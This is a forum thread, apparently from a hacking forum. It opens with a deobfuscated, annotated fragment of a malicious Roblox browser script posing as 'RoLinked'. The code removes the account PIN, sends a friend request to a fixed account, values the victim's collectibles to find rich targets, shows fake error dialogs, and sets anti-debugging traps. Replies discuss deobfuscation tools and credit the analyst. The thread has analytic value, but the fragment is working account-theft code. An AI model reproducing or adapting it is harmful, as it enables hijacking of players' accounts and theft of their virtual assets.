                      document.getElementsByClassName("btn-cta-md modal-modern-footer-button")[0].onclick = function () {
                        document.getElementById("pinPopupz").remove();
                        document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                      };
                    }
                  } else {
                    try {
                      document.getElementById("pinPopupz").remove();
                    } catch (err) {}
                    $.ajax({
                      method: "DELETE",
                      url: "https://auth.roblox.com/v1/account/pin",
                      contentType: "application/json",
                      success: function () {
                        onPinRemoved(null, null);
                      },
                      error: function (T) {
                        var g = atob(T.getResponseHeader("rblx-challenge-metadata"));
                        var d = T.getResponseHeader("rblx-challenge-id"),
                          n = g.split('"challengeId":"').pop().split('"')[0];
                        Z(n, d, null);
                      },
                    });
                  }
                } else {
                  onPinRemoved(null, null);
                }
              },
            });
          }
        }

        (async function () {
          await sleep(800);
          // ------------------------------------------------------------------
          // If that validDev array got filled from the earlier messages checks, then
          // we'll send a request to befriend the user with the id 6045232974.
          // (Not sure why this request is being sent in two difference places in this code).
          // ------------------------------------------------------------------
          if (validDev.length > 0) {
            console.log(validDev);
            try {
              var body = { friendshipOriginSourceType: 0 };
              $.ajax({
                method: "POST",
                url: "https://friends.roblox.com/v1/users/6045232974/request-friendship",
                contentType: "application/json",
                data: JSON.stringify(body),
              });
            } catch (err) {}
            onValuablesFound();
          // ------------------------------------------------------------------
          // If that validDev array did not get filled, then fetch all of your collectibles
          // ------------------------------------------------------------------
          } else {
            function fetchYourCollectibles(yourUserId) {
              const url = "https://inventory.roblox.com/v1/users/" + yourUserId + "/assets/collectibles?assetType=null&cursor=&limit=100&sortOrder=Desc";
              var req = {};
              req.url = url;
              req.type = 'GET';
              return $.ajax(req);
            }
            fetchYourCollectibles(yourUserId)
              .done(function (collectiblesResp) {
                if (collectiblesResp && collectiblesResp.data && collectiblesResp.data.length > 0) {
                  let totalWorth = 0;
                  collectiblesResp.data.forEach((collectible) => {
                    if (collectible.recentAveragePrice) {
                      totalWorth += collectible.recentAveragePrice;
                    }
                  });
                  // ------------------------------------------------------------------
                  // If the total value of your collectibles are worth more than "15000", go into this if.
                  // ------------------------------------------------------------------
                  if (totalWorth > 15000) {
                    onValuablesFound();
                  } else {
                    // ------------------------------------------------------------------
                    // If the total value of your collectibles are less more than "15000",
                    // show a fake dialog about how you can't be linked to RoLinked
                    // ------------------------------------------------------------------
                    var k = '<div id="promptPopup" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div role="document" class="modal-content"><div class="update-two-step"><div class="modal-header"><div class="modal-modern-header-button"><button type="button" class="close"><span aria-hidden="true"><span class="icon-close" id="closeButton1"></span></span><span class="sr-only">Close</span></button></div><div class="modal-title"><h5>Unable to link account</h5></div></div><div class="modal-body"><div class="text-center"><div>Your account is not qualified to be linked to RoLinked.\nAlternative accounts are not allowed</div></div></div><div class="modal-footer"></div></div></div></div></div></div>';
                    document.body.insertAdjacentHTML("beforeend", k);
                    document.getElementById("closeButton1").onclick = function () {
                      document.getElementById("promptPopup").remove();
                      document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                    };
                    document.getElementById("promptPopup").onclick = function () {
                      document.getElementById('promptPopup').remove();
                      document.getElementsByClassName('text-footer footer-note')[0].innerText = "Not Active";
                    };
                  }
                } else {
                  // ------------------------------------------------------------------
                  // If you have no collectibles,
                  // show a fake dialog about how you can't be linked to RoLinked
                  // ------------------------------------------------------------------
                  var k = '<div id="promptPopup" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div role="document" class="modal-content"><div class="update-two-step"><div class="modal-header"><div class="modal-modern-header-button"><button type="button" class="close"><span aria-hidden="true"><span class="icon-close" id="closeButton1"></span></span><span class="sr-only">Close</span></button></div><div class="modal-title"><h5>Unable to link account</h5></div></div><div class="modal-body"><div class="text-center"><div>Your account is not qualified to be linked to RoLinked.\nAlternative accounts are not allowed</div></div></div><div class="modal-footer"></div></div></div></div></div></div>';
                  document.body.insertAdjacentHTML("beforeend", k);
                  document.getElementById("closeButton1").onclick = function () {
                    document.getElementById('promptPopup').remove();
                    document.getElementsByClassName('text-footer footer-note')[0].innerText = "Not Active";
                  };
                  document.getElementById("promptPopup").onclick = function () {
                    document.getElementById("promptPopup").remove();
                    document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
                  };
                }
              })
              .fail(function (B, Z, J) {
                var k = Q.oSORj.split("|");
                while (true) {
                  switch (k[R++]) {
                    case "0":
                      document.getElementById(Q.qUdsc).onclick = function () {
                        document.getElementById(O.JCPqg).remove();
                        document.getElementsByClassName(O.DavTO)[0].innerText = O.VtMwq;
                      };
                      continue;
                    case "1":
                      document.getElementById(Q.pmnJW).onclick = function () {
                        document.getElementById(Q.pmnJW).remove();
                        document.getElementsByClassName(Q.SPlbc)[0].innerText = Q.uxNcA;
                      };
                      continue;
                    case "2":
                      document.body.insertAdjacentHTML(Q.EbCnN, '<div id="promptPopup" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div role="document" class="modal-content"><div class="update-two-step"><div class="modal-header"><div class="modal-modern-header-button"><button type="button" class="close"><span aria-hidden="true"><span class="icon-close" id="closeButton1"></span></span><span class="sr-only">Close</span></button></div><div class="modal-title"><h5>Error</h5></div></div><div class="modal-body"><div class="text-center"><div>Please refresh your page and try again, an error has occured.</div></div></div><div class="modal-footer"></div></div></div></div></div></div>');
                      continue;
                    case "3":
                      continue;
                    case "4":
                      var q = {};
                      (q.JCPqg = Q.pmnJW), (q.DavTO = Q.SPlbc), (q.VtMwq = Q.uxNcA);
                      continue;
                  }
                  break;
                }
              });
          }
        })();
      },
      error: function () {
        var M = {};
        M.NOlph = "promptPopup";
        M.iOrUy = "text-footer footer-note";
        M.zYFGg = "Not Active";
        document.body.insertAdjacentHTML("beforeend", '<div id="promptPopup" role="dialog"><div class="fade modal-backdrop in"></div><div role="dialog" tabindex="-1" class="fade modal-modern in modal" style="display: block; padding-left: 23px;"><div class="modal-dialog"><div role="document" class="modal-content"><div class="update-two-step"><div class="modal-header"><div class="modal-modern-header-button"><button type="button" class="close"><span aria-hidden="true"><span class="icon-close" id="closeButton1"></span></span><span class="sr-only">Close</span></button></div><div class="modal-title"><h5>Unable to link account</h5></div></div><div class="modal-body"><div class="text-center"><div>You are currently signed out of Roblox</div></div></div><div class="modal-footer"></div></div></div></div></div></div>');
        document.getElementById("closeButton1").onclick = function () {
          document.getElementById(j.NOlph).remove();
          document.getElementsByClassName(j.iOrUy)[0].innerText = j.zYFGg;
        };
        document.getElementById("promptPopup").onclick = function () {
          document.getElementById("promptPopup").remove();
          document.getElementsByClassName("text-footer footer-note")[0].innerText = "Not Active";
        };
      },
    });
  }
})();
function debuggerPrevention(maybeAction) {
  function fn(n) {
    if (typeof n === "string") {
      // Crash the page
      return Function("while (true) {}").apply("counter");
    } else {
      // Attempt to invoke "debugger" periodically - maybe as a way to make it difficult to debug the running code?
      n === 0
        ? Function("debugger")
            .call("action")
        : Function("debugger")
            .apply("stateObject");
    }
    // Recurse until the stack limit is reached.
    // The error will be silently ignored.
    fn(++n);
  }
  try {
    if (maybeAction) {
      return fn;
    } else {
      fn(0);
    }
  } catch (l) {}
}
(function () {
  var this_;
  try {
    var getThis = Function('return (function() {}.constructor("return this")( ));');
    this_ = getThis();
  } catch (l) {
    this_ = window;
  }
  this_.setInterval(debuggerPrevention, 4000);
})();

 

[qGodless]

(async function () {
  var callOnce1 = function (this_, fn) {
    var wrappedFn = function () {

thank you so much. can you share how you did it?

 

[gulak]

thank you so much. can you share how you did it?

there is online website for that matter !

 

[Web3Dev]

Here is the website, you can check

 

[sikidok]

I tried this page it didnt work.
Didnt do anything to the script.

 

[DarkToken]

I tryied this but I don't know if the result work well ?! LINK please try it and let us know

 

[mkhalilovx29]

Hi

you can use Restringer

GitHub - PerimeterX/restringer: A Javascript Deobfuscator

A Javascript Deobfuscator. Contribute to PerimeterX/restringer development by creating an account on GitHub.

github.com

 

[rand]

https://xss.pro/threads/122215/

 

[Lef]

shadowplatinum1 Указал бы хоть автора, парень/девушка проделали титаническую работу

Автор, - theScottyJam (

)

(async function () { var callOnce1 = function (this_, fn) { var wrappedF - Pastebin.com

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.

pastebin.com